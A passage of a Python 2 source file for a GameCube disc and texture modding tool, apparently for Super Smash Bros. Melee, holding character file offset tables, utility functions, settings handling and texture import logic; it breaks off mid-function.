(0x43a20, 0x4f020), (0x4f024, 0x4f240), (0x4f244, 0x4f460), (0x4f464, 0x4f680), (0x4f684, 0x4f8a0),
(0x4f8a4, 0x5aec0), (0x5aec4, 0x5b0e0), (0x5b0e4, 0x5b300), (0x5b304, 0x5b520), (0x5b524, 0x5b740), (0x5b744, 0x5b760) )
},
'Samus': { 'fullName': 'Samus', 'universe': 'Metroid',
'Bk': ( (0x29b20, 0x2dd20), (0x2dd20, 0x2e520), (0x2e520, 0x3b420), (0x3b420, 0x3bc20), (0x3bc20, 0x608a0) ),
'Gr': ( (0x29b20, 0x2dd20), (0x2dd20, 0x2fd20), (0x2fd20, 0x3cc20), (0x3cc20, 0x3d420), (0x3d420, 0x620a0) ),
'La': ( (0x29b20, 0x2dd20), (0x2dd20, 0x2e520), (0x2e520, 0x3b420), (0x3b420, 0x3bc20), (0x3bc20, 0x608a0) ),
'Nr': ( (0x29b20, 0x2dd20), (0x2dd20, 0x2e520), (0x2e520, 0x3b420), (0x3b420, 0x3bc20), (0x3bc20, 0x608a0) ),
'Pi': ( (0x29b20, 0x2dd20), (0x2dd20, 0x2e520), (0x2e520, 0x3b420), (0x3b420, 0x3d420), (0x3d420, 0x620a0) )
},
'Yoshi': { 'fullName': 'Yoshi', 'universe': 'Yoshi',
'Aq': ( (0x23fe0, 0x25fe0), (0x25fe0, 0x2a060), (0x2a064, 0x2a080), (0x2a080, 0x2e080), (0x2e080, 0x30080), (0x30080, 0x32080),
(0x32080, 0x35de0), (0x35de0, 0x37ac0), (0x37ac4, 0x37ae0), (0x37ae0, 0x38d20), (0x38d24, 0x38d40), (0x38d40, 0x3c6e0), (0x3c6e4, 0x3c700), (0x3c700, 0x3cc00), (0x3cc00, 0x3dc00),
(0x3dc00, 0x3ec20), (0x3ec24, 0x3ec40), (0x3ec40, 0x40d20), (0x40d24, 0x40d40), (0x40d40, 0x41d00), (0x42580, 0x46580) ),
'Bu': ( (0x2ed40, 0x30d40), (0x30d40, 0x34dc0), (0x34dc4, 0x34de0), (0x25fe0, 0x29fe0), (0x34de0, 0x36de0), (0x23fe0, 0x25fe0),
(0x29fe0, 0x2dd40), (0x36de0, 0x38a80), (0x38a84, 0x38aa0), (0x38aa0, 0x39cc0), (0x39cc4, 0x39ce0), (0x39ce0, 0x3d680), (0x3d684, 0x3d6a0), (0x3d6a0, 0x3dba0), (0x2dd40, 0x2ed40),
(0x3dba0, 0x3ebc0), (0x3ebc4, 0x3ebe0), (0x3ebe0, 0x40c40), (0x40c44, 0x40c60), (0x40c60, 0x41c20), (0x424a0, 0x464a0) ),
'Nr': ( (0x23fc0, 0x25fc0), (0x25fc0, 0x2a040), (0x2a044, 0x2a060), (0x2a060, 0x2e060), (0x2e060, 0x30060), (0x30060, 0x32060),
(0x32060, 0x35dc0), (0x35dc0, 0x37a40), (0x37a44, 0x37a60), (0x37a60, 0x38c80), (0x38c84, 0x38ca0), (0x38ca0, 0x3c640), (0x3c644, 0x3c660), (0x3c660, 0x3cb60), (0x3cb60, 0x3db60),
(0x3db60, 0x3eb80), (0x3eb84, 0x3eba0), (0x3eba0, 0x40be0), (0x40be4, 0x40c00), (0x40c00, 0x41bc0), (0x42440, 0x46440) ),
'Pi': ( (0x23fe0, 0x25fe0), (0x25fe0, 0x2a060), (0x2a064, 0x2a080), (0x2a080, 0x2e080), (0x2e080, 0x30080), (0x30080, 0x32080),
(0x32080, 0x35de0), (0x35de0, 0x37ae0), (0x37ae4, 0x37b00), (0x37b00, 0x38d20), (0x38d24, 0x38d40), (0x38d40, 0x3c6e0), (0x3c6e4, 0x3c700), (0x3c700, 0x3cc00), (0x3cc00, 0x3dc00),
(0x3dc00, 0x3ec20), (0x3ec24, 0x3ec40), (0x3ec40, 0x40d20), (0x40d24, 0x40d40), (0x40d60, 0x41d20), (0x425a0, 0x465a0) ),
'Re': ( (0x30d00, 0x32d00), (0x32d00, 0x36d80), (0x36d84, 0x36da0), (0x25fa0, 0x29fa0), (0x23fa0, 0x25fa0), (0x29fa0, 0x2bfa0),
(0x2bfa0, 0x2fd00), (0x36da0, 0x38aa0), (0x38aa4, 0x38ac0), (0x38ac0, 0x39ce0), (0x39ce4, 0x39d00), (0x39d00, 0x3d6a0), (0x3d6a4, 0x3d6c0), (0x3d6c0, 0x3dbc0), (0x2fd00, 0x30d00),
(0x3dbc0, 0x3ebe0), (0x3ebe4, 0x3ec00), (0x3ec00, 0x40d80), (0x40d84, 0x40da0), (0x40da0, 0x41d60), (0x425e0, 0x465e0) ),
'Ye': ( (0x2fd40, 0x31d40), (0x3cca0, 0x40d20), (0x40d24, 0x40d40), (0x25fe0, 0x29fe0), (0x23fe0, 0x25fe0), (0x29fe0, 0x2bfe0),
(0x2bfe0, 0x2fd40), (0x31d40, 0x33a20), (0x33a24, 0x33a40), (0x33a40, 0x34c60), (0x34c64, 0x34c80), (0x34c80, 0x38620), (0x38624, 0x38640), (0x38640, 0x38b40), (0x38b40, 0x39b40),
(0x39b40, 0x3ab60), (0x3ab64, 0x3ab80), (0x3ab80, 0x3cc80), (0x3cc84, 0x3cca0), (0x40d40, 0x41d00), (0x42580, 0x46580) )
},
'Zelda': { 'fullName': 'Zelda', 'universe': 'The Legend of Zelda',
'Bu': ( (0x1db60, 0x235a0), (0x235a0, 0x23ea0), (0x23ea0, 0x24ea0), (0x24ea0, 0x25fa0), (0x25fa4, 0x25fc), (0x25fc0, 0x39940),
(0x39940, 0x3a940), (0x3a940, 0x41ee0), (0x429c0, 0x529c0) ),
'Gr': ( (0x1db60, 0x235a0), (0x235a0, 0x23ea0), (0x23ea0, 0x24ea0), (0x24ea0, 0x25fa0), (0x25fa4, 0x25fc), (0x25fc0, 0x39940),
(0x39940, 0x3a940), (0x3a940, 0x41ee0), (0x429c0, 0x529c0) ),
'Nr': ( (0x1db60, 0x235a0), (0x235a0, 0x23ea0), (0x23ea0, 0x24ea0), (0x24ea0, 0x260a0), (0x260a4, 0x260c0), (0x260c0, 0x39a40),
(0x39a40, 0x3bba0), (0x3bba0, 0x43140), (0x43c20, 0x53c20) ),
'Re': ( (0x1db60, 0x235a0), (0x235a0, 0x23ea0), (0x23ea0, 0x24ea0), (0x24ea0, 0x25fa0), (0x25fa4, 0x25fc), (0x25fc0, 0x39940),
(0x39940, 0x3a940), (0x3a940, 0x41ee0), (0x429c0, 0x529c0) ),
'Wh': ( (0x1db60, 0x235a0), (0x235a0, 0x24da0), (0x24da0, 0x25da0), (0x25da0, 0x26ea0), (0x26ea4, 0x26ec0), (0x26ec0, 0x3a840),
(0x3a840, 0x3b840), (0x3b840, 0x42de0), (0x438c0, 0x538c0) )
}
}
#===========================#
# ~ ~ General Functions ~ ~ #
#===========================#
def isNaN( var ): # Test if a variable 'is Not a Number'
try:
float( var )
return False
except ValueError:
return True
def roundTo32( x, base=32 ): # Rounds up to nearest increment of 32.
return int( base * math.ceil(float(x) / base) )
# def CRC32_from_file( filename ):
# buf = open( filename, 'rb').read()
# buf = (binascii.crc32( buf ) & 0xFFFFFFFF)
# return "%08X" % buf
def uHex( integer ): # Quick conversion to have a hex function which shows uppercase characters.
return '0x' + hex( integer )[2:].upper() # Twice as fast as .format
# def float_to_hex( floatValue ):
# """ Converts a float to its hex representation, padded to 8 characters. """
# return '{0:0{1}X}'.format( struct.unpack('<I', struct.pack( '<f', floatValue ))[0], 8 )
def toInt( input ): # Converts a 1, 2, or 4 bytes object or bytearray to an integer.
try:
byteLength = len( input )
if ( byteLength == 1 ): return struct.unpack( '>B', input )[0] # big-endian unsigned char (1 byte)
elif ( byteLength == 2 ): return struct.unpack( '>H', input )[0] # big-endian unsigned short (2 bytes)
else: return struct.unpack( '>I', input )[0] # big-endian unsigned int (4 bytes)
except:
raise Exception( '\ntoInt was not able to convert the ' + str(type(input))+' type' )
def toBytes( input, byteLength=4, cType='' ): # Converts an int to a bytes object
if not cType: # Assume a big-endian unsigned value of some byte length
if byteLength == 1: cType = '>B' # big-endian unsigned char (1 byte)
elif byteLength == 2: cType = '>H' # big-endian unsigned short (2 bytes)
elif byteLength == 4: cType = '>I' # big-endian unsigned int (4 bytes)
else:
raise Exception( '\ntoBytes was not able to convert the ' + str(type(input))+' type' )
return struct.pack( cType, input )
# Conversion solutions:
# int -> bytes objects struct.pack( )
# byte string -> int: struct.unpack( )
# byte string -> hex string .encode( 'hex' )
# bytearray -> hex string: hexlify( input )
# hex string -> bytearray: bytearray.fromhex( input )
# text string -> bytearray init bytearray, then use .extend( string ) method on it
# Note that a file object's .read() method returns a byte-string of unknown encoding, which will be
# locally interpreted as it's displayed. It should be properly decoded to a standard to be operated on.
#
# Note 2: In python 2, bytes objects are an alias for str objects; they are not like bytearrays.
def validOffset( offset ): # Accepts a string.
offset = offset.replace( '0x', '' )
if offset == '': return False
return all(char in hexdigits for char in offset) # Returns Boolean
def grammarfyList( theList ): # For example, the list [apple, pear, banana, melon] becomes the string 'apple, pear, banana, and melon'.
if len(theList) == 1: return str(theList[0])
elif len(theList) == 2: return str(theList[0]) + ' and ' + str(theList[1])
else:
string = ', '.join( theList )
indexOfLastComma = string.rfind(',')
return string[:indexOfLastComma] + ', and ' + string[indexOfLastComma + 2:]
def msg( *args ):
if len(args) > 1: tkMessageBox.showinfo( message=args[0], title=args[-1] )
else: tkMessageBox.showinfo( message=args[0] )
def copyToClipboard( text ):
Gui.root.clipboard_clear()
Gui.root.clipboard_append( text )
def humansize(nbytes): # Used for converting file sizes, in terms of human readability.
suffixes = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']
if nbytes == 0: return '0 B'
i = 0
while nbytes >= 1024 and i < len(suffixes)-1:
nbytes /= 1024.
i += 1
f = ('%.2f' % nbytes).rstrip('0').rstrip('.')
return '%s %s' % (f, suffixes[i])
def createFolders( folderPath ):
try:
os.makedirs( folderPath )
# Primitive failsafe to prevent race condition
attempt = 0
while not os.path.exists( folderPath ):
time.sleep( .3 )
if attempt > 10:
raise Exception( 'Unable to create folder: ' + folderPath )
attempt += 1
except OSError as error: # Python >2.5
if error.errno == errno.EEXIST and os.path.isdir( folderPath ):
pass
else: raise
def validHex( offset ): # Accepts a string.
offset = offset.replace( '0x', '' )
if offset == '': return False
return all( char in hexdigits for char in offset ) # Returns Boolean
def rgb2hex( color ): # Input can be RGB or RGBA, but output will still be RGB
return '#{:02x}{:02x}{:02x}'.format( color[0], color[1], color[2])
def rgb2hsv( color ):
r, g, b, _ = color
r, g, b = r/255.0, g/255.0, b/255.0
mx = max(r, g, b)
mn = min(r, g, b)
df = mx-mn
if mx == mn: h = 0
elif mx == r: h = (60 * ((g-b)/df) + 360) % 360
elif mx == g: h = (60 * ((b-r)/df) + 120) % 360
elif mx == b: h = (60 * ((r-g)/df) + 240) % 360
if mx == 0: s = 0
else: s = df/mx
v = mx
return ( h, s, v )
def hex2rgb( inputStr ): # Expects RRGGBBAA
""" Returns a 4 color channel iterable of (r,g,b,a) """
inputStr = inputStr.replace( '#', '' )
channelsList = []
parsingError = False
if len( inputStr ) % 2 != 0: # Checks whether the string is an odd number of characters
parsingError = True
else:
for i in xrange( 0, len(inputStr), 2 ): # Iterate by 2 over the length of the input string
try:
byte = inputStr[i:i+2]
newInt = int( byte, 16 )
if newInt > -1 and newInt < 256: channelsList.append( newInt )
except:
parsingError = True
break
else: # Got through the above loop with no break. Still got one more check.
#if len( channelsList ) == 3: channelsList.append( 255 ) # assume the entries are RGB, and add alpha
if len( channelsList ) != 4: parsingError = True
return ( tuple(channelsList), parsingError )
def getLuminance( hexColor ):
r, g, b, a = hex2rgb( hexColor )[0]
return ( r*0.299 + g*0.587 + b*0.114 ) * a/255
#return ( r+r + g+g+g + b )/6 * a/255 # a quicker but less accurate calculation
#return math.sqrt( .299 * r**2 + .587 * g**2 + .114 * b**2 ) *a/255 / 255
def findBytes( bytesRange, target ): # Searches a bytearray for a given (target) set of bytes, and returns the location (index)
targetLength = len( target )
for index, _ in enumerate( bytesRange ):
if bytesRange[index:index+targetLength] == target: return index
else: return -1
def cmdChannel( command, standardInput=None, shell=True ):
""" IPC (Inter-Process Communication) to command line.
shell=True gives access to all shell features.
creationFlags=0x08000000 prevents creation of a console for the process. """
process = subprocess.Popen( command, shell=shell, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, creationflags=0x08000000 )
stdoutData, stderrData = process.communicate( input=standardInput )
if process.returncode == 0:
return ( process.returncode, stdoutData )
else:
print 'IPC error (exit code {}):'.format( process.returncode )
print stderrData
return ( process.returncode, stderrData )
def replaceHex( hexData, offset, newHex ): # Input takes a string, int, and string, respectively. todo: finish depricating this
offset = offset * 2 # Doubled to count by nibbles rather than bytes, since the data is just a string.
codeEndPoint = offset + len(newHex)
return hexData[:offset] + newHex + hexData[codeEndPoint:]
#=============================#
# ~ ~ Opening & Importing ~ ~ #
#=============================#
def openFolder( folderPath ):
normedPath = os.path.abspath( folderPath ) # Turns relative to absolute paths, and normalizes them (switches / for \, etc.)
if os.path.exists( normedPath ):
os.startfile( normedPath )
else:
msg( 'Could not find this folder: \n\n' + normedPath )
def loadSettings():
# Check for user defined settings / persistent memory.
if os.path.exists( settingsFile ): settings.read( settingsFile )
# Create the individual sections if they don't already exist.
if not settings.has_section('General Settings'): settings.add_section('General Settings')
if not settings.has_section('Texture Search Filters'): settings.add_section('Texture Search Filters')
# Set default settings if they were not loaded from the settings file, and validate the rest
for settingName in generalSettingsDefaults:
# If a default setting was not found in the settings file, set it to its default value
if not settings.has_option( 'General Settings', settingName ):
settings.set( 'General Settings', settingName, generalSettingsDefaults[settingName] )
# If the setting is present and should be a number, validate it.
elif settingName == 'maxFilesToRemember' or settingName == 'globalFontSize' or settingName == 'paddingBetweenFiles':
value = settings.get( 'General Settings', settingName )
if settingName == 'maxFilesToRemember' or settingName == 'globalFontSize':
if isNaN( value ):
msg( 'The value for the saved setting "' + settingName + '" does not appear to be a number. '
'The default value of ' + generalSettingsDefaults[settingName] + ' will be used instead.',
'Error Loading Settings' )
settings.set( 'General Settings', settingName, generalSettingsDefaults[settingName] )
elif settingName == 'paddingBetweenFiles' and value.lower() != 'auto':
try: int( value, 16 )
except:
msg( 'The value for the saved setting "paddingBetweenFiles" is invalid. '
'The value should be a hexadecimal number, or "auto". The default value '
'of ' + generalSettingsDefaults[settingName] + ' will be used instead.',
'Error Loading Settings' )
settings.set( 'General Settings', settingName, generalSettingsDefaults[settingName] )
# Convert the filter string to its numeral representation.
if settingName == 'downscalingFilter':
validFilters = ( 'nearest', 'lanczos', 'bilinear', 'bicubic' )
currentFilter = settings.get( 'General Settings', 'downscalingFilter' )
if not currentFilter in validFilters: # Filter string unrecognized
msg( "The given downscaling filter is invalid; valid options are 'nearest', 'lanczos', 'bilinear', or 'bicubic'. "
'The default value of ' + generalSettingsDefaults[settingName] + ' will be used instead.', 'Error Loading Settings' )
settings.set( 'General Settings', settingName, generalSettingsDefaults[settingName] )
for settingName in imageFiltersDefaults:
if not settings.has_option('Texture Search Filters', settingName):
settings.set( 'Texture Search Filters', settingName, imageFiltersDefaults[settingName] )
else:
# Perform some validation on the setting's value (by making sure there is a comparator and separator)
value = settings.get( 'Texture Search Filters', settingName )
if '|' not in value or len( value.split('|')[0] ) > 2:
msg( 'A problem was detected for the texture search filter setting, "' + settingName + '". The '
'default value of ' + generalSettingsDefaults[settingName] + ' will be used instead.', 'Error Loading Settings' )
settings.set( 'Texture Search Filters', settingName, imageFiltersDefaults[settingName] )
global generalBoolSettings
for settingName in generalBoolSettingsDefaults:
if not settings.has_option( 'General Settings', settingName ):
settings.set( 'General Settings', settingName, generalBoolSettingsDefaults[settingName] )
if settingName not in generalBoolSettings: generalBoolSettings[ settingName ] = Tk.BooleanVar() # Should only occur on initial program start
# These are a special set of control variables, BooleanVars(), which must be created separately/anew from the settings in the configParser settings object
generalBoolSettings[settingName].set( settings.getboolean('General Settings', settingName) )
# These values will have some post-processing done; so they will be initialized here so that the post-processing is done just once.
global imageFilters
for settingName in imageFiltersDefaults:
if settingName == 'imageTypeFilter': charToReplace = '_'
else: charToReplace = ','
imageFilters[settingName] = tuple( settings.get( 'Texture Search Filters', settingName ).replace( charToReplace, '' ).split( '|' ) )
def getRecentFilesLists(): # Returns two lists of tuples (ISOs & DATs), where each tuple is a ( filepath, dateTimeObject )
# Collect the current [separate] lists of recent ISOs, and recent DAT (or other) files.
ISOs = []
DATs = []
if settings.has_section('Recent Files'):
recentFiles = settings.options('Recent Files')
for filepath in recentFiles:
try:
newDatetimeObject = datetime.strptime( settings.get('Recent Files', filepath), "%Y-%m-%d %H:%M:%S.%f" )
optionTuple = ( filepath, newDatetimeObject ) # Tuple of ( normalizedPath, dateTimeObject ).
ext = os.path.splitext( filepath )[1].lower()
if ext == '.iso' or ext == '.gcm' or isRootFolder( filepath.replace('|', ':'), showError=False )[0]:
ISOs.append( optionTuple )
else: DATs.append( optionTuple )
except:
removeEntry = tkMessageBox.askyesno( 'Error Parsing Settings File', 'The timestamp for one of the recently opened files, "' + filepath.replace('|', ':') + '", could not be read. '
'The settings file, or just this entry within it, seems to be corrupted.'
'\n\nDo you want to remove this item from the list of recently opened files?' )
if removeEntry: settings.remove_option( 'Recent Files', filepath )
return ISOs, DATs
def promptToOpenFile( typeToOpen ):
""" This is primarily a wrapper for the 'Open Disc' and 'Open DAT' options in the main menu. """
if typeToOpen == 'iso':
titleString = "Choose an ISO or GCM file to open."
filetypes = [('Disc image files', '*.iso *.gcm'), ('All files', '*.*')]
else:
titleString = "Choose a texture data file to open."
filetypes = [('Texture data files', '*.dat *.usd *.lat *.rat'), ('All files', '*.*')]
filepath = tkFileDialog.askopenfilename(
title=titleString,
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
filetypes=filetypes
)
fileHandler( [filepath] ) # Will handle validation of the filepath.
def openDatDestination( event ):
""" This is only called by pressing Enter/Return on the top file path display/entry of
the DAT Texture Tree tab. Verifies given the path and loads the file for viewing. """
filepath = Gui.datDestination.get().replace( '"', '' )
if pathIsFromDisc( Gui.datDestination ):
iid = filepath.lower()
loadFileWithinDisc( iid )
else:
fileHandler( [filepath] )
def openIsoDestination( event ):
""" This is only called by pressing Enter/Return on the top file path display/entry of
the Disc Details tab. Verifies the given path and loads the file for viewing. """
filepath = Gui.isoDestination.get().replace( '"', '' )
if pathIsFromDisc( Gui.isoDestination ):
iid = filepath.lower()
loadFileWithinDisc( iid )
else:
fileHandler( [filepath] )
def rememberFile( filepath, updateDefaultDirectory=True ):
""" Checks for the settings file and creates it as well as the 'Recent Files' section if they don't exist.
Then saves the given filepath so it can be recalled later from the 'Open Recent' menu. """
extension = os.path.splitext( filepath )[1].lower()
filepath = os.path.normpath( filepath ) # Normalizes it to prevent duplicate entries
timeStamp = str( datetime.today() )
# If the settings file exists, and has more than max entries for the current file type, remove the extras
if settings.has_section('Recent Files'):
# Collect the current [separate] lists of recent ISOs, and recent DAT (or other) files.
maxFiles = int( settings.get('General Settings', 'maxFilesToRemember') )
ISOs, DATs = getRecentFilesLists()
# For the current filetype, sort the list so that the oldest file is first
if extension == '.iso' or extension == '.gcm' or isRootFolder( filepath )[0]: targetList = ISOs
else: targetList = DATs
targetList.sort( key=lambda recentInfo: recentInfo[1] )
# Remove the oldest file(s) from the settings file until the specified max number of files to remember is reached.
while len( targetList ) > maxFiles - 1:
settings.remove_option( 'Recent Files', targetList[0][0] )
targetList.pop( 0 )
# Update the default search directory.
if updateDefaultDirectory:
dirPath = os.path.dirname( filepath )
settings.set( 'General Settings', 'defaultSearchDirectory', dirPath )
if not settings.has_section('Recent Files'): settings.add_section('Recent Files')
settings.set( 'Recent Files', filepath.replace(':', '|'), timeStamp ) # Colon is replaced because it confuses the settings parser.
# Save the current program settings to the file
with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
def fileHandler( filepaths, dropTarget='', updateDefaultDirectory=True, updateDetailsTab=True ):
""" All opened standalone ISO & DAT files should pass through this (regardless of whether it was from dra-and-drop,
file menu, or other methods), with the exception of files viewed with the 'prev/next DAT' buttons. """
if filepaths == [] or filepaths == ['']: return
elif len( filepaths ) == 1:
extension = os.path.splitext( filepaths[0] )[1].lower()
mostOccuringTypes = [extension]
else:
# Figure out the most common type of file among the filepaths (which should be a list) to determine how the group should be processed.
typeCounts = {}
for filepath in filepaths:
ext = os.path.splitext( filepath )[1].lower()
if ext in typeCounts: typeCounts[ext] += 1
else: typeCounts[ext] = 1
maxUniqueOccurances = max( typeCounts.values() )
mostOccuringTypes = [ x for x, y in typeCounts.items() if y == maxUniqueOccurances ]
# Normalize the paths (prevents discrepancies between paths with forward vs. back slashes, etc.) and remove files that cannot be found.
filepaths = [ os.path.normpath( filepath ) for filepath in filepaths ]
verifiedPaths = []
unverifiedPaths = []
for filepath in filepaths:
if os.path.exists( filepath ): verifiedPaths.append( filepath )
else: unverifiedPaths.append( filepath )
# Alert the user of any files that could not be found.
if unverifiedPaths:
if len(unverifiedPaths) == 1:
msg( 'Unable to find "' + unverifiedPaths[0] + '".', 'Error: Unverifiable Path' )
else: msg( 'Unable to find these files:\n\n' + '\n'.join( unverifiedPaths ), 'Error: Unverifiable Paths' )
if verifiedPaths == []: return
global globalDatFile, globalBannerFile
currentTab = Gui.root.nametowidget( Gui.mainTabFrame.select() )
# If there's only one file and it's a disc image (ISO or GCM), process it without regard for which tab is currently active.
if len( verifiedPaths ) == 1 and ( extension == '.iso' or extension == '.gcm' ):
# Check whether there are changes that the user wants to save
if globalBannerFile and not globalBannerFile.noChangesToBeSaved( programClosing ): return
elif not noDiscChangesToBeSaved(): return
# Clear old DAT data if it's from a previously loaded disc
elif globalDatFile and globalDatFile.source == 'disc':
if not globalDatFile.noChangesToBeSaved( programClosing ): return
else: # No changes that the user wants to save; OK to clear the DAT file.
restoreEditedEntries( editedDatEntries )
clearDatTab( True )
clearStructuralAnalysisTab( True )
globalDatFile = None
Gui.datDestination.set('')
# Clear old banner file
globalBannerFile = None
restoreEditedEntries( editedBannerEntries )
rememberFile( verifiedPaths[0], updateDefaultDirectory )
globalDiscDetails['isoFilePath'] = verifiedPaths[0]
scanDisc( updateDetailsTab=updateDetailsTab )
elif '.iso' in mostOccuringTypes or '.gcm' in mostOccuringTypes:
msg('Please only provide one disc image (ISO or GCM file) at a time.')
# If there's only one path and it's not an image/texture file
elif len( verifiedPaths ) == 1 and extension != '.png' and extension != '.tpl':
thisFile = verifiedPaths[0]
# Check if it's a disc root directory.
if os.path.isdir( thisFile ):
if isRootFolder( thisFile, showError=False )[0]:
rememberFile( thisFile, updateDefaultDirectory )
globalDiscDetails['isoFilePath'] = thisFile
scanRoot( updateDetailsTab=updateDetailsTab )
else:
msg( 'Only extracted root directories are able to opened in this way.' )
return
elif extension == '.bnr' : # A banner was given. Switch to the Disc Details tab and load it.
if not globalBannerFile or (globalBannerFile and globalBannerFile.noChangesToBeSaved( programClosing ) ): # i.e. no file has been loaded, or it's OK to overwrite
restoreEditedEntries( editedBannerEntries )
rememberFile( thisFile, updateDefaultDirectory )
loadStandaloneFile( thisFile )
# Assume it's some form of DAT
elif not globalDatFile or (globalDatFile and globalDatFile.noChangesToBeSaved( programClosing ) ): # i.e. no file has been loaded, or it's OK to overwrite
# Perform some rudimentary validation; if it passes, remember it and load it
if os.path.getsize( thisFile ) > 20971520: # i.e. 20 MB
msg("The recieved file doesn't appear to be a DAT or other type of texture file, as it's larger than 20 MB. "
"If this is actually supposed to be a disc image, rename the file with an extension of '.ISO' or '.GCM'.")
else:
restoreEditedEntries( editedDatEntries )
rememberFile( thisFile, updateDefaultDirectory )
#if dropTarget == '': # Called from a menu, or drag-n-dropped onto the program icon; not dropped onto the GUI.
if currentTab == Gui.savTab:
loadStandaloneFile( thisFile, toAnalyze=True, changeTab=False )
# elif currentTab == Gui.cccTab and dropTarget == '': # Case where the 'Open Converted File' button on the CCC tab is used.
# loadStandaloneFile( thisFile, tabToChangeTo=Gui.datTab )
elif dropTarget.startswith('cccTab'):
# Get the DAT data and relocation table from the target file.
with open( thisFile, 'rb') as binaryFile:
datHex = binaryFile.read().encode( 'hex' )
prepareColorConversion( thisFile, datHex, dropTarget[6:].lower() )
else:
loadStandaloneFile( thisFile )
# Process images.
elif len( verifiedPaths ) == 1 and ( extension == '.png' or extension == '.tpl' ): processTextureImports( verifiedPaths, currentTab )
elif '.png' in mostOccuringTypes or '.tpl' in mostOccuringTypes: processTextureImports( verifiedPaths, currentTab )
else:
msg('Please only provide one data file (DAT, USD, etc.) or root folder at a time. \n\nFor textures, only PNG and TPL file formats are supported.')
def importImageFiles( event=None ):
currentlySelectedTab = Gui.root.nametowidget( Gui.mainTabFrame.select() )
if currentlySelectedTab == Gui.discTab or currentlySelectedTab == Gui.mtrTab:
title = "Choose one or more texture files to import (PNG or TPL)."
selectMultiple = True
elif currentlySelectedTab == Gui.discDetailsTab:
# Preliminary check that there's a banner file loaded.
if not globalBannerFile:
msg( 'No banner file or disc appears to be loaded.', 'Cannot Import Banner Image' )
return
title = "Choose a 96x32 banner image to import (PNG or TPL)."
selectMultiple = False
elif currentlySelectedTab == Gui.datTab:
if Gui.datTextureTree.selection() == '':
msg( 'You must select one or more textures to replace when importing textures with this tab.' + \
"\n\nIf you'd like to use the filename to automatically dictate where this texture will go, change to the 'Disc File Tree' tab " + \
'and try this operation again.', 'No Texture Selected. Cannot import texture.' )
return
title = "Choose a texture file to import (PNG or TPL)."
selectMultiple = False
else:
msg( 'You may only import textures while using the Disc File Tree tab, DAT Texture Tree tab, '
'or the Manual Replacement tab.' )
return
# Prompt to select the file to import.
textureFilepaths = tkFileDialog.askopenfilename( # Will return a unicode string (if one file selected), or a tuple
title=title,
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
filetypes=[ ('PNG files', '*.png'), ('TPL files', '*.tpl'), ('All files', '*.*') ],
multiple=selectMultiple
)
if textureFilepaths:
# Normalize the input into list form
if not isinstance( textureFilepaths, list ) and not isinstance( textureFilepaths, tuple ):
textureFilepaths = [textureFilepaths]
# Update the default directory to start in when opening or exporting files.
settings.set( 'General Settings', 'defaultSearchDirectory', os.path.dirname(textureFilepaths[0]) )
with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
processTextureImports( textureFilepaths, currentlySelectedTab )
def processTextureImports( textureFilepaths, currentlySelectedTab, warnAboutPaletteRegen=True ):
global unsavedDiscChanges
unconventionalNames = []
filesNotFoundInDisc = []
formatUnsupported = []
imageHeaderNotFound = []
imageTypeNotFound = []
invalidDimensions = []
invalidMipmapDims = []
invalidImageProperties = []
invalidPaletteProperties = []
notEnoughSpace = []
paletteRegenerated = []
paletteTooLarge = []
paletteNotFound = []
unknownErrors = []
successfulImports = 0
failedImports = 0
# Determine import behavior by checking what tab is selected.
if currentlySelectedTab == Gui.discTab:
if globalDiscDetails['isoFilePath'] == '':
msg( 'No disc image has been loaded.' )
return
else:
datIidToReload = ''
workingFile = 1
gameId = globalDiscDetails['gameId'].lower()
for textureFilepath in textureFilepaths:
# Update the GUI status feedback.
updateProgramStatus( 'Processing File ' + str(workingFile) + '....' )
Gui.programStatusLabel.update()
workingFile += 1
# Validate the filename; confirm that it's of the standard naming convention and parse it for info.
imageType, imageDataOffset, sourceFile = codecBase.parseFilename( os.path.basename( textureFilepath ) )
iid = ( gameId + '/' + sourceFile.replace( '-', '/' ) ).lower()
if imageType == -1 or imageDataOffset == -1 or sourceFile == '':
unconventionalNames.append( textureFilepath )
failedImports += 1
elif not Gui.isoFileTree.exists( iid ):
filesNotFoundInDisc.append( (textureFilepath, sourceFile.replace( '-', '/' )) )
failedImports += 1
else:
# Get info on the target file and load it
_, entity, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( iid, 'values' )
try:
thisDat = hsdFiles.datFileObj( source='disc' )
thisDat.load( iid, fileData=getFileDataFromDiscTreeAsBytes( iid=iid ), fileName=os.path.basename( isoPath ) )
except:
unknownErrors.append( (textureFilepath, 'fileLoadError') )
continue
# Write the image data into the target file
status, return2, return3 = writeTextureToDat( thisDat, textureFilepath, imageDataOffset - 0x20, False )
if status == 'dataObtained' or status == 'dataWithAdHocPalette' or status == 'paletteRegenerated': # or status == 'invalidDimensions'
# The write operation was a success. Save the new file data
newFileData = hexlify( thisDat.getFullData() )
Gui.isoFileTree.item( iid, values=('Includes updated textures', entity, isoOffset, fileSize, isoPath, 'ram', newFileData), tags='changed' )
# Check if the dat currently loaded in the DAT Texture Tree tab has been updated with a new texture, and queue it for reloading if it has
if not datIidToReload and globalDatFile and globalDatFile.source == 'disc' and globalDatFile.path.lower() == iid:
datIidToReload = iid
# Remember notices to the user, to present once the import loop is finished.
if status == 'paletteRegenerated' or status == 'dataWithAdHocPalette':
paletteRegenerated.append( textureFilepath ) # Successful, but had to create a new palette / image colors
successfulImports += 1
else:
# Remember errors to the user, to present once the import loop is finished.
imageDataOffset = uHex( imageDataOffset ) # This already includes 0x20 header offset
if status == 'formatUnsupported': formatUnsupported.append( textureFilepath )
elif status == 'imageHeaderNotFound': imageHeaderNotFound.append( (textureFilepath, imageDataOffset) )
elif status == 'imageTypeNotFound': imageTypeNotFound.append( textureFilepath )
elif status == 'invalidDimensions': invalidDimensions.append( (textureFilepath, False) )
elif status == 'invalidMipmapDims': invalidMipmapDims.append( textureFilepath )
elif status == 'invalidImageProperties': invalidImageProperties.append( (textureFilepath, imageDataOffset, return2, return3) )
elif status == 'invalidPaletteProperties': invalidPaletteProperties.append( (textureFilepath, imageDataOffset, return2, return3) )
elif status == 'notEnoughSpace': notEnoughSpace.append( (textureFilepath, imageDataOffset) )
elif status == 'paletteTooLarge': paletteTooLarge.append( (textureFilepath, imageDataOffset, return2, return3) )
